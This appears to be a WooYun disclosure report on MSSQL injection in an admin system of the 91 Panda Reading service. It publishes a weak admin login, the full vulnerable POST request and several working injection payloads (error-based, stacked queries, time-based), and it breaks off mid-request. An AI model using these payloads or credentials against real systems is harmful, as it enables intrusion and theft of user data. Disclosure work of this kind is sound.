当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0157856

漏洞标题:91熊猫看书某重要系统MSSQL注入(涉及2000+W用户信息)

相关厂商:福建网龙

漏洞作者: Looke

提交时间:2015-12-03 08:38

修复时间:2016-01-17 11:02

公开时间:2016-01-17 11:02

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:20

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-12-03: 细节已通知厂商并且等待厂商处理中
2015-12-03: 厂商已经确认,细节仅向厂商公开
2015-12-13: 细节向核心白帽子及相关领域专家公开
2015-12-23: 细节向普通白帽子公开
2016-01-02: 细节向实习白帽子公开
2016-01-17: 细节向公众公开

简要描述:

RT

详细说明:

漏洞系统:http://boss.ks.91.com/
弱口令:wanghuan 123456
登入系统:

1.png


能干的事情实在太多,比如可以给任意用户补偿熊猫币,任意账户查询,随意下架书籍、添加广告等等。

2.png


这都不是重点,随意找一个搜索框,发现都是注入

221.png


POST /Push/PandaPushMessage.aspx?_dc=1449074954365 HTTP/1.1
Host: boss.ks.91.com
Proxy-Connection: keep-alive
Content-Length: 5155
Cache-Control: max-age=0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Origin: http://boss.ks.91.com
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/46.0.2490.86 Safari/537.36
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryh5dqQ61NBdyh41V2
Referer: http://boss.ks.91.com/Push/PandaPushMessage.aspx
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8
Cookie: ASP.NET_SessionId=ikomqye14ftpkiaedbebwhc3
------WebKitFormBoundaryh5dqQ61NBdyh41V2
Content-Disposition: form-data; name="MainContent_txtTitle"
1*
------WebKitFormBoundaryh5dqQ61NBdyh41V2
Content-Disposition: form-data; name="MainContent_ptbSpendData_ActivePage"
1
------WebKitFormBoundaryh5dqQ61NBdyh41V2
Content-Disposition: form-data; name="__EVENTTARGET"
ctl00$rmCurrent
------WebKitFormBoundaryh5dqQ61NBdyh41V2
Content-Disposition: form-data; name="__EVENTARGUMENT"
MainContent_dataStore|postback|refresh
------WebKitFormBoundaryh5dqQ61NBdyh41V2
Content-Disposition: form-data; name="__VIEWSTATE"
/wEPDwULLTE1MzgzMzgyMzMPZBYCZg9kFgICAw9kFgICAw9kFgQCAw9kFgRmD2QWAmYPFgIeBWNsYXNzBQh4LWhpZGRlbmQCAQ9kFgICAQ8UKhJTeXN0ZW0uV2ViLlVJLlBhaXIBDwUJdnNNZW1iZXJzFCsAAg8FDkF1dG9Mb2FkUGFyYW1zDwICFCsAAhQrBAEPBQRiYXNlFgYeBE5hbWUFBXN0YXJ0HgVWYWx1ZQUBMB4ETW9kZQspZUV4dC5OZXQuUGFyYW1ldGVyTW9kZSwgRXh0Lk5ldCwgVmVyc2lvbj0xLjIuMC4zMjE5OSwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj0yZTEyY2UzZDAxNzZjZDg3ABQrBAEPBQRiYXNlFgYfAQUFbGltaXQfAgUDMTAwHwMLKwUADwUGUmVhZGVyFCsEAQ8FBGJhc2UWBh4NVG90YWxQcm9wZXJ0eQUFdG90YWweBFJvb3QFBGRhdGEeCklEUHJvcGVydHkFAklEZAIFD2QWAgIBD2QWBGYPZBYCZg8WAh8ABQh4LWhpZGRlbmQCAQ9kFgJmDxYCHwAFCHgtaGlkZGVuFgQCBQ8UKwQBDwUJdnNNZW1iZXJzFCsAAQ8FBUl0ZW1zDwIEFCsABBQrBAEPBQRiYXNlFgQeBFRleHQFDOaJgOacieW5s+WPsB8CBQI5ORQrBAEPBQRiYXNlFgQfBwUMSVBob25l5bmz5Y+wHwIFATEUKwQBDwUEYmFzZRYEHwcFGOWuieWNk+aWsOeJiChWNi4y5LmL5ZCOKR8CBQE0FCsEAQ8FBGJhc2UWBB8HBRjlronljZPml6fniYgoVjYuMuS5i+WJjSkfAgUCNDRkAgkPFCsEAQ8FCXZzTWVtYmVycxQrAAEPBQVJdGVtcw8CARQrAAEUKwQBDwUEYmFzZRYEHwcFCeWFqOaYvuekuh8CBQEwZBgBBR5fX0NvbnRyb2xzUmVxdWlyZVBvc3RCYWNrS2V5X18WFgUPY3RsMDAkcm1DdXJyZW50BRxjdGwwMCRNYWluQ29udGVudCRGb3JtYXRUeXBlBRljdGwwMCRNYWluQ29udGVudCRwbFF1ZXJ5BRpjdGwwMCRNYWluQ29udGVudCR0eHRUaXRsZQUaY3RsMDAkTWFpbkNvbnRlbnQkYnRuUXVlcnkFGGN0bDAwJE1haW5Db250ZW50JGJ0bkFkZAUYY3RsMDAkTWFpbkNvbnRlbnQkZ3BMaXN0BR5jdGwwMCRNYWluQ29udGVudCRwdGJTcGVuZERhdGEFJmN0bDAwJE1haW5Db250ZW50JFBhbmRhUHVzaEVkaXQxJElzQWRkBSljdGwwMCRNYWluQ29udGVudCRQYW5kYVB1c2hFZGl0MSR3ZEVkaXRvcgUnY3RsMDAkTWFpbkNvbnRlbnQkUGFuZGFQdXNoRWRpdDEkUGFuZWwyBSdjdGwwMCRNYWluQ29udGVudCRQYW5kYVB1c2hFZGl0MSRQYW5lbDEFJmN0bDAwJE1haW5Db250ZW50JFBhbmRhUHVzaEVkaXQxJHR4dElEBSljdGwwMCRNYWluQ29udGVudCRQYW5kYVB1c2hFZGl0MSR0eHRUaXRsZQUyY3RsMDAkTWFpbkNvbnRlbnQkUGFuZGFQdXNoRWRpdDEkY21iTW9iaWxlVHlwZU5hbWUFJ2N0bDAwJE1haW5Db250ZW50JFBhbmRhUHVzaEVkaXQxJHR4dFVybAUnY3RsMDAkTWFpbkNvbnRlbnQkUGFuZGFQdXNoRWRpdDEkY2JUeXBlBStjdGwwMCRNYWluQ29udGVudCRQYW5kYVB1c2hFZGl0MSR0eHRDb250ZWN0BStjdGwwMCRNYWluQ29udGVudCRQYW5kYVB1c2hFZGl0MSR0eHRVc2VySURTBS5jdGwwMCRNYWluQ29udGVudCRQYW5kYVB1c2hFZGl0MSR0eHRDcmVhdGVUaW1lBShjdGwwMCRNYWluQ29udGVudCRQYW5kYVB1c2hFZGl0MSRidG5TYXZlBSpjdGwwMCRNYWluQ29udGVudCRQYW5kYVB1c2hFZGl0MSRidG5DYW5jZWwU8tG6ilBkzDVP72wtYtqI58JWcGS8hhWomcbtRbsFAQ==
------WebKitFormBoundaryh5dqQ61NBdyh41V2
Content-Disposition: form-data; name="__EVENTVALIDATION"
/wEWAgL5iZXwBQKd1pjuDkM/WynfA4ziA8/WZZmj9lyJWiisVwefIce/r3hKDRee
------WebKitFormBoundaryh5dqQ61NBdyh41V2
Content-Disposition: form-data; name="MainContent_FormatType"
------WebKitFormBoundaryh5dqQ61NBdyh41V2
Content-Disposition: form-data; name="MainContent_PandaPushEdit1_IsAdd"
------WebKitFormBoundaryh5dqQ61NBdyh41V2
Content-Disposition: form-data; name="MainContent_gpList_SM"
------WebKitFormBoundaryh5dqQ61NBdyh41V2
Content-Disposition: form-data; name="MainContent_PandaPushEdit1_txtID"
------WebKitFormBoundaryh5dqQ61NBdyh41V2
Content-Disposition: form-data; name="MainContent_PandaPushEdit1_txtTitle"
------WebKitFormBoundaryh5dqQ61NBdyh41V2
Content-Disposition: form-data; name="MainContent_PandaPushEdit1_cmbMobileTypeName_Value"
------WebKitFormBoundaryh5dqQ61NBdyh41V2
Content-Disposition: form-data; name="MainContent_PandaPushEdit1_cmbMobileTypeName"
------WebKitFormBoundaryh5dqQ61NBdyh41V2
Content-Disposition: form-data; name="MainContent_PandaPushEdit1_cmbMobileTypeName_SelIndex"
------WebKitFormBoundaryh5dqQ61NBdyh41V2
Content-Disposition: form-data; name="MainContent_PandaPushEdit1_txtUrl"
------WebKitFormBoundaryh5dqQ61NBdyh41V2
Content-Disposition: form-data; name="MainContent_PandaPushEdit1_cbType_Value"
0
------WebKitFormBoundaryh5dqQ61NBdyh41V2
Content-Disposition: form-data; name="MainContent_PandaPushEdit1_cbType"
全显示
------WebKitFormBoundaryh5dqQ61NBdyh41V2
Content-Disposition: form-data; name="MainContent_PandaPushEdit1_cbType_SelIndex"
0
------WebKitFormBoundaryh5dqQ61NBdyh41V2
Content-Disposition: form-data; name="MainContent_PandaPushEdit1_txtContect"
------WebKitFormBoundaryh5dqQ61NBdyh41V2
Content-Disposition: form-data; name="MainContent_PandaPushEdit1_txtUserIDS"
备注:以英文 , 分隔
------WebKitFormBoundaryh5dqQ61NBdyh41V2
Content-Disposition: form-data; name="MainContent_PandaPushEdit1_txtCreateTime"
------WebKitFormBoundaryh5dqQ61NBdyh41V2
Content-Disposition: form-data; name="submitDirectEventConfig"
{"config":{"extraParams":{"start":0,"limit":100,"sort":"ID","dir":"ASC"}}}
------WebKitFormBoundaryh5dqQ61NBdyh41V2
Content-Disposition: form-data; name="__ExtNetDirectEventMarker"
delta=true
------WebKitFormBoundaryh5dqQ61NBdyh41V2--


各种注入类型

---
Parameter: #1* ((custom) POST)
Type: error-based
Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause
Payload: ------WebKitFormBoundarydEuFUCx2QXyzCtlV
Content-Disposition: form-data; name="MainContent_txtTitle"
1' AND 1996=CONVERT(INT,(SELECT CHAR(113)+CHAR(112)+CHAR(118)+CHAR(112)+CHAR(113
)+(SELECT (CASE WHEN (1996=1996) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHA
R(106)+CHAR(118)+CHAR(118)+CHAR(113))) AND 'NsVd' LIKE 'NsVd
------WebKitFormBoundarydEuFUCx2QXyzCtlV
Content-Disposition: form-data; name="MainContent_ptbSpendData_ActivePage"
1
------WebKitFormBoundarydEuFUCx2QXyzCtlV
Content-Disposition: form-data; name="__EVENTTARGET"
ctl00$rmCurrent
------WebKitFormBoundarydEuFUCx2QXyzCtlV
Content-Disposition: form-data; name="__EVENTARGUMENT"
MainContent_dataStore|postback|refresh
------WebKitFormBoundarydEuFUCx2QXyzCtlV
Content-Disposition: form-data; name="__VIEWSTATE"
/wEPDwULLTE1MzgzMzgyMzMPZBYCZg9kFgICAw9kFgICAw9kFgQCAw9kFgRmD2QWAmYPFgIeBWNsYXNz
BQh4LWhpZGRlbmQCAQ9kFgICAQ8UKhJTeXN0ZW0uV2ViLlVJLlBhaXIBDwUJdnNNZW1iZXJzFCsAAg8F
DkF1dG9Mb2FkUGFyYW1zDwICFCsAAhQrBAEPBQRiYXNlFgYeBE5hbWUFBXN0YXJ0HgVWYWx1ZQUBMB4E
TW9kZQspZUV4dC5OZXQuUGFyYW1ldGVyTW9kZSwgRXh0Lk5ldCwgVmVyc2lvbj0xLjIuMC4zMjE5OSwg
Q3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj0yZTEyY2UzZDAxNzZjZDg3ABQrBAEPBQRiYXNl
FgYfAQUFbGltaXQfAgUDMTAwHwMLKwUADwUGUmVhZGVyFCsEAQ8FBGJhc2UWBh4NVG90YWxQcm9wZXJ0
eQUFdG90YWweBFJvb3QFBGRhdGEeCklEUHJvcGVydHkFAklEZAIFD2QWAgIBD2QWBGYPZBYCZg8WAh8A
BQh4LWhpZGRlbmQCAQ9kFgJmDxYCHwAFCHgtaGlkZGVuFgQCBQ8UKwQBDwUJdnNNZW1iZXJzFCsAAQ8F
BUl0ZW1zDwIEFCsABBQrBAEPBQRiYXNlFgQeBFRleHQFDOaJgOacieW5s+WPsB8CBQI5ORQrBAEPBQRi
YXNlFgQfBwUMSVBob25l5bmz5Y+wHwIFATEUKwQBDwUEYmFzZRYEHwcFGOWuieWNk+aWsOeJiChWNi4y
5LmL5ZCOKR8CBQE0FCsEAQ8FBGJhc2UWBB8HBRjlronljZPml6fniYgoVjYuMuS5i+WJjSkfAgUCNDRk
AgkPFCsEAQ8FCXZzTWVtYmVycxQrAAEPBQVJdGVtcw8CARQrAAEUKwQBDwUEYmFzZRYEHwcFCeWFqOaY
vuekuh8CBQEwZBgBBR5fX0NvbnRyb2xzUmVxdWlyZVBvc3RCYWNrS2V5X18WFgUPY3RsMDAkcm1DdXJy
ZW50BRxjdGwwMCRNYWluQ29udGVudCRGb3JtYXRUeXBlBRljdGwwMCRNYWluQ29udGVudCRwbFF1ZXJ5
BRpjdGwwMCRNYWluQ29udGVudCR0eHRUaXRsZQUaY3RsMDAkTWFpbkNvbnRlbnQkYnRuUXVlcnkFGGN0
bDAwJE1haW5Db250ZW50JGJ0bkFkZAUYY3RsMDAkTWFpbkNvbnRlbnQkZ3BMaXN0BR5jdGwwMCRNYWlu
Q29udGVudCRwdGJTcGVuZERhdGEFJmN0bDAwJE1haW5Db250ZW50JFBhbmRhUHVzaEVkaXQxJElzQWRk
BSljdGwwMCRNYWluQ29udGVudCRQYW5kYVB1c2hFZGl0MSR3ZEVkaXRvcgUnY3RsMDAkTWFpbkNvbnRl
bnQkUGFuZGFQdXNoRWRpdDEkUGFuZWwyBSdjdGwwMCRNYWluQ29udGVudCRQYW5kYVB1c2hFZGl0MSRQ
YW5lbDEFJmN0bDAwJE1haW5Db250ZW50JFBhbmRhUHVzaEVkaXQxJHR4dElEBSljdGwwMCRNYWluQ29u
dGVudCRQYW5kYVB1c2hFZGl0MSR0eHRUaXRsZQUyY3RsMDAkTWFpbkNvbnRlbnQkUGFuZGFQdXNoRWRp
dDEkY21iTW9iaWxlVHlwZU5hbWUFJ2N0bDAwJE1haW5Db250ZW50JFBhbmRhUHVzaEVkaXQxJHR4dFVy
bAUnY3RsMDAkTWFpbkNvbnRlbnQkUGFuZGFQdXNoRWRpdDEkY2JUeXBlBStjdGwwMCRNYWluQ29udGVu
dCRQYW5kYVB1c2hFZGl0MSR0eHRDb250ZWN0BStjdGwwMCRNYWluQ29udGVudCRQYW5kYVB1c2hFZGl0
MSR0eHRVc2VySURTBS5jdGwwMCRNYWluQ29udGVudCRQYW5kYVB1c2hFZGl0MSR0eHRDcmVhdGVUaW1l
BShjdGwwMCRNYWluQ29udGVudCRQYW5kYVB1c2hFZGl0MSRidG5TYXZlBSpjdGwwMCRNYWluQ29udGVu
dCRQYW5kYVB1c2hFZGl0MSRidG5DYW5jZWwU8tG6ilBkzDVP72wtYtqI58JWcGS8hhWomcbtRbsFAQ==
------WebKitFormBoundarydEuFUCx2QXyzCtlV
Content-Disposition: form-data; name="__EVENTVALIDATION"
/wEWAgL5iZXwBQKd1pjuDkM/WynfA4ziA8/WZZmj9lyJWiisVwefIce/r3hKDRee
------WebKitFormBoundarydEuFUCx2QXyzCtlV
Content-Disposition: form-data; name="MainContent_FormatType"
------WebKitFormBoundarydEuFUCx2QXyzCtlV
Content-Disposition: form-data; name="MainContent_PandaPushEdit1_IsAdd"
------WebKitFormBoundarydEuFUCx2QXyzCtlV
Content-Disposition: form-data; name="MainContent_gpList_SM"
------WebKitFormBoundarydEuFUCx2QXyzCtlV
Content-Disposition: form-data; name="MainContent_PandaPushEdit1_txtID"
------WebKitFormBoundarydEuFUCx2QXyzCtlV
Content-Disposition: form-data; name="MainContent_PandaPushEdit1_txtTitle"
------WebKitFormBoundarydEuFUCx2QXyzCtlV
Content-Disposition: form-data; name="MainContent_PandaPushEdit1_cmbMobileTypeNa
me_Value"
------WebKitFormBoundarydEuFUCx2QXyzCtlV
Content-Disposition: form-data; name="MainContent_PandaPushEdit1_cmbMobileTypeNa
me"
------WebKitFormBoundarydEuFUCx2QXyzCtlV
Content-Disposition: form-data; name="MainContent_PandaPushEdit1_cmbMobileTypeNa
me_SelIndex"
------WebKitFormBoundarydEuFUCx2QXyzCtlV
Content-Disposition: form-data; name="MainContent_PandaPushEdit1_txtUrl"
------WebKitFormBoundarydEuFUCx2QXyzCtlV
Content-Disposition: form-data; name="MainContent_PandaPushEdit1_cbType_Value"
0
------WebKitFormBoundarydEuFUCx2QXyzCtlV
Content-Disposition: form-data; name="MainContent_PandaPushEdit1_cbType"
全显示
------WebKitFormBoundarydEuFUCx2QXyzCtlV
Content-Disposition: form-data; name="MainContent_PandaPushEdit1_cbType_SelIndex
"
0
------WebKitFormBoundarydEuFUCx2QXyzCtlV
Content-Disposition: form-data; name="MainContent_PandaPushEdit1_txtContect"
------WebKitFormBoundarydEuFUCx2QXyzCtlV
Content-Disposition: form-data; name="MainContent_PandaPushEdit1_txtUserIDS"
备注:以英文 , 分隔
------WebKitFormBoundarydEuFUCx2QXyzCtlV
Content-Disposition: form-data; name="MainContent_PandaPushEdit1_txtCreateTime"
------WebKitFormBoundarydEuFUCx2QXyzCtlV
Content-Disposition: form-data; name="submitDirectEventConfig"
{"config":{"extraParams":{"start":0,"limit":100,"sort":"ID","dir":"ASC"}}}
------WebKitFormBoundarydEuFUCx2QXyzCtlV
Content-Disposition: form-data; name="__ExtNetDirectEventMarker"
delta=true
------WebKitFormBoundarydEuFUCx2QXyzCtlV--
Type: stacked queries
Title: Microsoft SQL Server/Sybase stacked queries (comment)
Payload: ------WebKitFormBoundarydEuFUCx2QXyzCtlV
Content-Disposition: form-data; name="MainContent_txtTitle"
1';WAITFOR DELAY '0:0:5'--
------WebKitFormBoundarydEuFUCx2QXyzCtlV
Content-Disposition: form-data; name="MainContent_ptbSpendData_ActivePage"
1
------WebKitFormBoundarydEuFUCx2QXyzCtlV
Content-Disposition: form-data; name="__EVENTTARGET"
ctl00$rmCurrent
------WebKitFormBoundarydEuFUCx2QXyzCtlV
Content-Disposition: form-data; name="__EVENTARGUMENT"
MainContent_dataStore|postback|refresh
------WebKitFormBoundarydEuFUCx2QXyzCtlV
Content-Disposition: form-data; name="__VIEWSTATE"
/wEPDwULLTE1MzgzMzgyMzMPZBYCZg9kFgICAw9kFgICAw9kFgQCAw9kFgRmD2QWAmYPFgIeBWNsYXNz
BQh4LWhpZGRlbmQCAQ9kFgICAQ8UKhJTeXN0ZW0uV2ViLlVJLlBhaXIBDwUJdnNNZW1iZXJzFCsAAg8F
DkF1dG9Mb2FkUGFyYW1zDwICFCsAAhQrBAEPBQRiYXNlFgYeBE5hbWUFBXN0YXJ0HgVWYWx1ZQUBMB4E
TW9kZQspZUV4dC5OZXQuUGFyYW1ldGVyTW9kZSwgRXh0Lk5ldCwgVmVyc2lvbj0xLjIuMC4zMjE5OSwg
Q3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj0yZTEyY2UzZDAxNzZjZDg3ABQrBAEPBQRiYXNl
FgYfAQUFbGltaXQfAgUDMTAwHwMLKwUADwUGUmVhZGVyFCsEAQ8FBGJhc2UWBh4NVG90YWxQcm9wZXJ0
eQUFdG90YWweBFJvb3QFBGRhdGEeCklEUHJvcGVydHkFAklEZAIFD2QWAgIBD2QWBGYPZBYCZg8WAh8A
BQh4LWhpZGRlbmQCAQ9kFgJmDxYCHwAFCHgtaGlkZGVuFgQCBQ8UKwQBDwUJdnNNZW1iZXJzFCsAAQ8F
BUl0ZW1zDwIEFCsABBQrBAEPBQRiYXNlFgQeBFRleHQFDOaJgOacieW5s+WPsB8CBQI5ORQrBAEPBQRi
YXNlFgQfBwUMSVBob25l5bmz5Y+wHwIFATEUKwQBDwUEYmFzZRYEHwcFGOWuieWNk+aWsOeJiChWNi4y
5LmL5ZCOKR8CBQE0FCsEAQ8FBGJhc2UWBB8HBRjlronljZPml6fniYgoVjYuMuS5i+WJjSkfAgUCNDRk
AgkPFCsEAQ8FCXZzTWVtYmVycxQrAAEPBQVJdGVtcw8CARQrAAEUKwQBDwUEYmFzZRYEHwcFCeWFqOaY
vuekuh8CBQEwZBgBBR5fX0NvbnRyb2xzUmVxdWlyZVBvc3RCYWNrS2V5X18WFgUPY3RsMDAkcm1DdXJy
ZW50BRxjdGwwMCRNYWluQ29udGVudCRGb3JtYXRUeXBlBRljdGwwMCRNYWluQ29udGVudCRwbFF1ZXJ5
BRpjdGwwMCRNYWluQ29udGVudCR0eHRUaXRsZQUaY3RsMDAkTWFpbkNvbnRlbnQkYnRuUXVlcnkFGGN0
bDAwJE1haW5Db250ZW50JGJ0bkFkZAUYY3RsMDAkTWFpbkNvbnRlbnQkZ3BMaXN0BR5jdGwwMCRNYWlu
Q29udGVudCRwdGJTcGVuZERhdGEFJmN0bDAwJE1haW5Db250ZW50JFBhbmRhUHVzaEVkaXQxJElzQWRk
BSljdGwwMCRNYWluQ29udGVudCRQYW5kYVB1c2hFZGl0MSR3ZEVkaXRvcgUnY3RsMDAkTWFpbkNvbnRl
bnQkUGFuZGFQdXNoRWRpdDEkUGFuZWwyBSdjdGwwMCRNYWluQ29udGVudCRQYW5kYVB1c2hFZGl0MSRQ
YW5lbDEFJmN0bDAwJE1haW5Db250ZW50JFBhbmRhUHVzaEVkaXQxJHR4dElEBSljdGwwMCRNYWluQ29u
dGVudCRQYW5kYVB1c2hFZGl0MSR0eHRUaXRsZQUyY3RsMDAkTWFpbkNvbnRlbnQkUGFuZGFQdXNoRWRp
dDEkY21iTW9iaWxlVHlwZU5hbWUFJ2N0bDAwJE1haW5Db250ZW50JFBhbmRhUHVzaEVkaXQxJHR4dFVy
bAUnY3RsMDAkTWFpbkNvbnRlbnQkUGFuZGFQdXNoRWRpdDEkY2JUeXBlBStjdGwwMCRNYWluQ29udGVu
dCRQYW5kYVB1c2hFZGl0MSR0eHRDb250ZWN0BStjdGwwMCRNYWluQ29udGVudCRQYW5kYVB1c2hFZGl0
MSR0eHRVc2VySURTBS5jdGwwMCRNYWluQ29udGVudCRQYW5kYVB1c2hFZGl0MSR0eHRDcmVhdGVUaW1l
BShjdGwwMCRNYWluQ29udGVudCRQYW5kYVB1c2hFZGl0MSRidG5TYXZlBSpjdGwwMCRNYWluQ29udGVu
dCRQYW5kYVB1c2hFZGl0MSRidG5DYW5jZWwU8tG6ilBkzDVP72wtYtqI58JWcGS8hhWomcbtRbsFAQ==
------WebKitFormBoundarydEuFUCx2QXyzCtlV
Content-Disposition: form-data; name="__EVENTVALIDATION"
/wEWAgL5iZXwBQKd1pjuDkM/WynfA4ziA8/WZZmj9lyJWiisVwefIce/r3hKDRee
------WebKitFormBoundarydEuFUCx2QXyzCtlV
Content-Disposition: form-data; name="MainContent_FormatType"
------WebKitFormBoundarydEuFUCx2QXyzCtlV
Content-Disposition: form-data; name="MainContent_PandaPushEdit1_IsAdd"
------WebKitFormBoundarydEuFUCx2QXyzCtlV
Content-Disposition: form-data; name="MainContent_gpList_SM"
------WebKitFormBoundarydEuFUCx2QXyzCtlV
Content-Disposition: form-data; name="MainContent_PandaPushEdit1_txtID"
------WebKitFormBoundarydEuFUCx2QXyzCtlV
Content-Disposition: form-data; name="MainContent_PandaPushEdit1_txtTitle"
------WebKitFormBoundarydEuFUCx2QXyzCtlV
Content-Disposition: form-data; name="MainContent_PandaPushEdit1_cmbMobileTypeNa
me_Value"
------WebKitFormBoundarydEuFUCx2QXyzCtlV
Content-Disposition: form-data; name="MainContent_PandaPushEdit1_cmbMobileTypeNa
me"
------WebKitFormBoundarydEuFUCx2QXyzCtlV
Content-Disposition: form-data; name="MainContent_PandaPushEdit1_cmbMobileTypeNa
me_SelIndex"
------WebKitFormBoundarydEuFUCx2QXyzCtlV
Content-Disposition: form-data; name="MainContent_PandaPushEdit1_txtUrl"
------WebKitFormBoundarydEuFUCx2QXyzCtlV
Content-Disposition: form-data; name="MainContent_PandaPushEdit1_cbType_Value"
0
------WebKitFormBoundarydEuFUCx2QXyzCtlV
Content-Disposition: form-data; name="MainContent_PandaPushEdit1_cbType"
全显示
------WebKitFormBoundarydEuFUCx2QXyzCtlV
Content-Disposition: form-data; name="MainContent_PandaPushEdit1_cbType_SelIndex
"
0
------WebKitFormBoundarydEuFUCx2QXyzCtlV
Content-Disposition: form-data; name="MainContent_PandaPushEdit1_txtContect"
------WebKitFormBoundarydEuFUCx2QXyzCtlV
Content-Disposition: form-data; name="MainContent_PandaPushEdit1_txtUserIDS"
备注:以英文 , 分隔
------WebKitFormBoundarydEuFUCx2QXyzCtlV
Content-Disposition: form-data; name="MainContent_PandaPushEdit1_txtCreateTime"
------WebKitFormBoundarydEuFUCx2QXyzCtlV
Content-Disposition: form-data; name="submitDirectEventConfig"
{"config":{"extraParams":{"start":0,"limit":100,"sort":"ID","dir":"ASC"}}}
------WebKitFormBoundarydEuFUCx2QXyzCtlV
Content-Disposition: form-data; name="__ExtNetDirectEventMarker"
delta=true
------WebKitFormBoundarydEuFUCx2QXyzCtlV--
Type: AND/OR time-based blind
Title: Microsoft SQL Server/Sybase time-based blind (comment)
Payload: ------WebKitFormBoundarydEuFUCx2QXyzCtlV
Content-Disposition: form-data; name="MainContent_txtTitle"
1' WAITFOR DELAY '0:0:5'--
------WebKitFormBoundarydEuFUCx2QXyzCtlV
Content-Disposition: form-data; name="MainContent_ptbSpendData_ActivePage"
1
------WebKitFormBoundarydEuFUCx2QXyzCtlV
Content-Disposition: form-data; name="__EVENTTARGET"
ctl00$rmCurrent
------WebKitFormBoundarydEuFUCx2QXyzCtlV
Content-Disposition: form-data; name="__EVENTARGUMENT"
MainContent_dataStore|postback|refresh
------WebKitFormBoundarydEuFUCx2QXyzCtlV
Content-Disposition: form-data; name="__VIEWSTATE"
/wEPDwULLTE1MzgzMzgyMzMPZBYCZg9kFgICAw9kFgICAw9kFgQCAw9kFgRmD2QWAmYPFgIeBWNsYXNz
BQh4LWhpZGRlbmQCAQ9kFgICAQ8UKhJTeXN0ZW0uV2ViLlVJLlBhaXIBDwUJdnNNZW1iZXJzFCsAAg8F
DkF1dG9Mb2FkUGFyYW1zDwICFCsAAhQrBAEPBQRiYXNlFgYeBE5hbWUFBXN0YXJ0HgVWYWx1ZQUBMB4E
TW9kZQspZUV4dC5OZXQuUGFyYW1ldGVyTW9kZSwgRXh0Lk5ldCwgVmVyc2lvbj0xLjIuMC4zMjE5OSwg
Q3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj0yZTEyY2UzZDAxNzZjZDg3ABQrBAEPBQRiYXNl
FgYfAQUFbGltaXQfAgUDMTAwHwMLKwUADwUGUmVhZGVyFCsEAQ8FBGJhc2UWBh4NVG90YWxQcm9wZXJ0
eQUFdG90YWweBFJvb3QFBGRhdGEeCklEUHJvcGVydHkFAklEZAIFD2QWAgIBD2QWBGYPZBYCZg8WAh8A
BQh4LWhpZGRlbmQCAQ9kFgJmDxYCHwAFCHgtaGlkZGVuFgQCBQ8UKwQBDwUJdnNNZW1iZXJzFCsAAQ8F
BUl0ZW1zDwIEFCsABBQrBAEPBQRiYXNlFgQeBFRleHQFDOaJgOacieW5s+WPsB8CBQI5ORQrBAEPBQRi
YXNlFgQfBwUMSVBob25l5bmz5Y+wHwIFATEUKwQBDwUEYmFzZRYEHwcFGOWuieWNk+aWsOeJiChWNi4y
5LmL5ZCOKR8CBQE0FCsEAQ8FBGJhc2UWBB8HBRjlronljZPml6fniYgoVjYuMuS5i+WJjSkfAgUCNDRk
AgkPFCsEAQ8FCXZzTWVtYmVycxQrAAEPBQVJdGVtcw8CARQrAAEUKwQBDwUEYmFzZRYEHwcFCeWFqOaY
vuekuh8CBQEwZBgBBR5fX0NvbnRyb2xzUmVxdWlyZVBvc3RCYWNrS2V5X18WFgUPY3RsMDAkcm1DdXJy
ZW50BRxjdGwwMCRNYWluQ29udGVudCRGb3JtYXRUeXBlBRljdGwwMCRNYWluQ29udGVudCRwbFF1ZXJ5
BRpjdGwwMCRNYWluQ29udGVudCR0eHRUaXRsZQUaY3RsMDAkTWFpbkNvbnRlbnQkYnRuUXVlcnkFGGN0
bDAwJE1haW5Db250ZW50JGJ0bkFkZAUYY3RsMDAkTWFpbkNvbnRlbnQkZ3BMaXN0BR5jdGwwMCRNYWlu
Q29udGVudCRwdGJTcGVuZERhdGEFJmN0bDAwJE1haW5Db250ZW50JFBhbmRhUHVzaEVkaXQxJElzQWRk
BSljdGwwMCRNYWluQ29udGVudCRQYW5kYVB1c2hFZGl0MSR3ZEVkaXRvcgUnY3RsMDAkTWFpbkNvbnRl
bnQkUGFuZGFQdXNoRWRpdDEkUGFuZWwyBSdjdGwwMCRNYWluQ29udGVudCRQYW5kYVB1c2hFZGl0MSRQ
YW5lbDEFJmN0bDAwJE1haW5Db250ZW50JFBhbmRhUHVzaEVkaXQxJHR4dElEBSljdGwwMCRNYWluQ29u
dGVudCRQYW5kYVB1c2hFZGl0MSR0eHRUaXRsZQUyY3RsMDAkTWFpbkNvbnRlbnQkUGFuZGFQdXNoRWRp
dDEkY21iTW9iaWxlVHlwZU5hbWUFJ2N0bDAwJE1haW5Db250ZW50JFBhbmRhUHVzaEVkaXQxJHR4dFVy
bAUnY3RsMDAkTWFpbkNvbnRlbnQkUGFuZGFQdXNoRWRpdDEkY2JUeXBlBStjdGwwMCRNYWluQ29udGVu
dCRQYW5kYVB1c2hFZGl0MSR0eHRDb250ZWN0BStjdGwwMCRNYWluQ29udGVudCRQYW5kYVB1c2hFZGl0
MSR0eHRVc2VySURTBS5jdGwwMCRNYWluQ29udGVudCRQYW5kYVB1c2hFZGl0MSR0eHRDcmVhdGVUaW1l
BShjdGwwMCRNYWluQ29udGVudCRQYW5kYVB1c2hFZGl0MSRidG5TYXZlBSpjdGwwMCRNYWluQ29udGVu
dCRQYW5kYVB1c2hFZGl0MSRidG5DYW5jZWwU8tG6ilBkzDVP72wtYtqI58JWcGS8hhWomcbtRbsFAQ==
------WebKitFormBoundarydEuFUCx2QXyzCtlV
Content-Disposition: form-data; name="__EVENTVALIDATION"
